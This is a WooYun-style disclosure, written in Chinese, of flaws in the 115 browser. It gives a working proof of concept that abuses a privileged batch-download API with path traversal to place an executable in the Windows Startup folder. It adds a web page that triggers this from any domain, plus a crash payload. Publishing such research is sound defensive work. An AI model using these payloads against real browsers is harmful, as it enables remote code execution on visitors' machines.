WooYun.org

来看看最新的115浏览器：

--------------------------------------
0x00 远程命令执行
---------------------------------------
在主页中排查API的时候发现一个下载的API，在browserInterface里，调用格式如下：

function (urls, names, path) { 
native function NativeBatchDownloadFilesToLocal(); 
NativeBatchDownloadFilesToLocal(urls, names, path);
}

Urls为下载URL的列表，names为文件名，path为本地保存路径。
这个调用参数一看就是chrome://downloads域的文件下载功能的接口。
传入参数进行测试：

在下载路径下出现了文件：

但是看到这里的路径用的是默认路径，即：

尝试一下目录跳转，将path改为../test，发现在创建文件夹的时候去掉了特殊符号直接当做文件名本地创建，不存在跳转的逻辑。
而names参数可以用来控制文件名，那么使用这个参数控制跳转试试：

可以看到路径中将跳转符号包含进去了，来到下载目录看看，发现已经执行了跳转逻辑：

既然能够利用names参数和path参数联合进行跳转，那么不难写出POC：

window.browserInterface.BatchDownloadFilesToLocal(["http://127.0.0.1/calc.exe"], ["../../../exploitcat/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/calc.exe"],"test") ;

------------------------------------
0x01 任意域执行特权API
------------------------------------
拿到了命令执行的方法，下面找找特权域吧，经过测试115浏览器居然任意域都能执行特权API。这下连找XSS的步骤都省了。
随意一个页面：

<!DOCTYPE html>
<html>
<head>
</head>
<body>
115浏览器RCE测试
<script type="text/javascript">
    browserInterface.BatchDownloadFilesToLocal(
        ["http://127.0.0.1/calc.exe"], 
        ["../../../exploitcat/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/calc.exe"], "test2");
</script>
</body>
</html>

录制一个gif说明问题：
http://7xjb22.com1.z0.glb.clouddn.com/115browserRCE.gif
------------------------------------
0x02 赠送的DOS漏洞
------------------------------------
在测试中发现，敏感API中如果参数的类型出错会使浏览器崩溃，造成DOS漏洞。
POC如下：

browserInterface.BatchDownload("http://www.qq.com",null,null)